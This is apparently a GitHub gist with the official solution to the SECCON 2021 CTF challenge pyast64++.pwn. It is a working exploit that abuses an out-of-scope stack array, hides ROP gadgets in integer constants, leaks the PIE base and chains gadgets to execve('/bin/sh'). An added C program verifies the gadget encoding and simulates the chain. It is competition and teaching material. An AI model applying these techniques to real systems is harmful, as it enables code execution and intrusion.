@ptr-yudai
Last active December 12, 2021 09:47
Official solution for pyast64++.pwn from SECCON 2021
def get_overlap():
    # [vuln] Return a local array out-of-scope: the caller receives a pointer
    # into a dead stack frame, which the frames of f1/f2 will later overlap
    return array(0x100)

def f1(evil):
    # Create padding for ROP chain: this array shifts f2's frame so that
    # evil[0x1b] lands on f2's saved return address
    x = array(0xe0)
    f2(evil)

def gadgets():
    # Never called. Each constant is compiled into the binary as a 32-bit
    # immediate, so its little-endian bytes are executable code at a fixed
    # offset from the program base (e.g. 0x00c3d231 -> 31 d2 c3 = xor edx, edx; ret)
    0x00c3d231 # xor edx, edx; ret;
    0x00c3f631 # xor esi, esi; ret;
    0x00c35f50 # push rax; pop rdi; ret;
    0x00c3c031 # xor eax, eax; ret;
    0x00c33bb0 # mov al, 59; ret;      (59 = execve on x86-64)
    0x00c3050f # syscall; ret;
    0x00c35a5a # pop rdx; pop rdx; ret

def f2(evil):
    # Prepare ROP chain
    # evil[0x1b] holds the saved return address; subtracting its offset in the
    # binary leaks the PIE base
    proc_base = evil[0x1b] - 0x11d5
    evil[0x1b] = proc_base + 0x1212 # pop rdx; pop rdx; ret
    # skip evil pointer and type field (evil[0x1c], evil[0x1d]): they are
    # consumed by the two pops above
    evil[0x1e] = proc_base + 0x11fa # push rax; pop rdi; ret  (rdi = "/bin/sh")
    evil[0x1f] = proc_base + 0x11ee # xor edx, edx; ret       (envp = NULL)
    evil[0x20] = proc_base + 0x11f4 # xor esi, esi; ret       (argv = NULL)
    evil[0x21] = proc_base + 0x1200 # xor eax, eax; ret
    evil[0x22] = proc_base + 0x1206 # mov al, 59; ret         (rax = execve)
    evil[0x23] = proc_base + 0x120c # syscall; ret            -> execve("/bin/sh", 0, 0)
    # "/bin/sh\0" as one little-endian qword (0x0068732f6e69622f), assembled
    # from two 32-bit halves; the two multiplications are a 32-bit left shift
    binsh = array(1)
    binsh[0] = 0x0068732f * 0x10000 * 0x10000 + 0x6e69622f
    # Returned in rax, which the first gadget moves into rdi; +8 skips the
    # array's header so rax points at the string bytes
    return binsh + 8

def main():
    evil = get_overlap()
    f1(evil)
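The two encoding tricks in the solution (gadget bytes smuggled into 32-bit immediates, and "/bin/sh" assembled from two 32-bit halves) and the register state the chain leaves at `syscall` can be checked offline. The C program below is an added example, not ptr-yudai's code or part of the challenge: it decodes the seven constants from gadgets(), rebuilds the binsh qword, and walks the chain from f2() through a toy x86-64 model with the gadget offsets from the gist. The base address and "/bin/sh" pointer passed in are made-up sample values, and the stack layout (return slot, then the two discarded qwords, then the gadgets) is taken from the indices written in f2().

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Gadget immediates exactly as listed in gadgets(), and the bytes each one
 * spells when stored little-endian (the fourth byte, 00, is padding). */
static const uint32_t GADGET_IMM[7] = {
    0x00c3d231, 0x00c3f631, 0x00c35f50, 0x00c3c031,
    0x00c33bb0, 0x00c3050f, 0x00c35a5a,
};
static const uint8_t GADGET_BYTES[7][3] = {
    {0x31, 0xd2, 0xc3},  /* xor edx, edx ; ret */
    {0x31, 0xf6, 0xc3},  /* xor esi, esi ; ret */
    {0x50, 0x5f, 0xc3},  /* push rax ; pop rdi ; ret */
    {0x31, 0xc0, 0xc3},  /* xor eax, eax ; ret */
    {0xb0, 0x3b, 0xc3},  /* mov al, 59 ; ret   (59 = SYS_execve) */
    {0x0f, 0x05, 0xc3},  /* syscall ; ret */
    {0x5a, 0x5a, 0xc3},  /* pop rdx ; pop rdx ; ret */
};

/* Pack up to four gadget bytes into the immediate that, once emitted
 * little-endian by the compiler, places those bytes in executable memory. */
static uint32_t imm_from_bytes(const uint8_t *b, size_t n) {
    uint32_t imm = 0;
    for (size_t i = 0; i < n && i < 4; i++)
        imm |= (uint32_t)b[i] << (8 * i);
    return imm;
}

/* 1 if every constant in gadgets() encodes the intended gadget bytes. */
static int gadgets_decode_ok(void) {
    for (int g = 0; g < 7; g++)
        if (imm_from_bytes(GADGET_BYTES[g], 3) != GADGET_IMM[g])
            return 0;
    return 1;
}

/* "/bin/sh\0" as one qword, built the same way as binsh[0] in f2():
 * multiplying by 0x10000 twice shifts the high half up by 32 bits. */
static uint64_t binsh_qword(void) {
    uint64_t hi = 0x0068732f, lo = 0x6e69622f;
    return hi * 0x10000 * 0x10000 + lo;
}

/* 1 if the qword, stored little-endian, reads as the NUL-terminated string. */
static int binsh_qword_is_string(void) {
    uint64_t q = binsh_qword();
    char buf[8];
    memcpy(buf, &q, sizeof buf);            /* little-endian host (x86-64) */
    return memcmp(buf, "/bin/sh", 8) == 0;  /* 8 bytes: includes the NUL */
}

/* Gadget offsets from f2(); chain entries are base + offset. */
enum {
    OFF_XOR_EDX = 0x11ee, OFF_XOR_ESI = 0x11f4, OFF_PUSH_RAX_POP_RDI = 0x11fa,
    OFF_XOR_EAX = 0x1200, OFF_MOV_AL_59 = 0x1206, OFF_SYSCALL = 0x120c,
    OFF_POP_RDX_X2 = 0x1212,
};

/* Toy model: `ret` pops the next gadget, each gadget updates registers, and
 * we stop at `syscall`.  Slot 0 is evil[0x1b] (overwritten return address),
 * slots 1 and 2 are the evil pointer and type field the double pop discards.
 * rax enters holding f2's return value, the "/bin/sh" pointer.  Returns 1 if
 * the syscall is execve(binsh_ptr, NULL, NULL). */
static int chain_reaches_execve(uint64_t base, uint64_t binsh_ptr) {
    uint64_t stack[9] = {
        base + OFF_POP_RDX_X2, 0xdeadbeef /* evil ptr */, 0x1 /* type */,
        base + OFF_PUSH_RAX_POP_RDI, base + OFF_XOR_EDX, base + OFF_XOR_ESI,
        base + OFF_XOR_EAX, base + OFF_MOV_AL_59, base + OFF_SYSCALL,
    };
    uint64_t rax = binsh_ptr, rdi = 0, rsi = 0x4141, rdx = 0x4242;
    uint64_t *rsp = stack;
    for (;;) {
        uint64_t rip = *rsp++;               /* ret */
        switch (rip - base) {
        case OFF_POP_RDX_X2:       rdx = rsp[1]; rsp += 2; break;
        case OFF_PUSH_RAX_POP_RDI: rdi = rax; break;
        case OFF_XOR_EDX:          rdx = 0; break;
        case OFF_XOR_ESI:          rsi = 0; break;
        case OFF_XOR_EAX:          rax = 0; break;
        case OFF_MOV_AL_59:        rax = (rax & ~0xffULL) | 59; break;
        case OFF_SYSCALL:          /* execve(rdi, rsi, rdx) */
            return rax == 59 && rdi == binsh_ptr && rsi == 0 && rdx == 0;
        default:                   return 0;  /* ran off the chain */
        }
    }
}

int main(void) {
    /* Sample base and string pointer are made-up values for the trace. */
    printf("gadget constants decode: %s\n", gadgets_decode_ok() ? "ok" : "BAD");
    printf("binsh qword 0x%016llx is \"/bin/sh\": %s\n",
           (unsigned long long)binsh_qword(), binsh_qword_is_string() ? "yes" : "no");
    printf("chain reaches execve: %s\n",
           chain_reaches_execve(0x555555554000ULL, 0x7ffc00001000ULL) ? "yes" : "no");
    return 0;
}
```

Note that the order of the gadgets matters: `push rax; pop rdi` must run before `xor eax, eax`, otherwise the "/bin/sh" pointer in rax is lost before it reaches rdi, and `mov al, 59` only sets the low byte, which is why `xor eax, eax` precedes it.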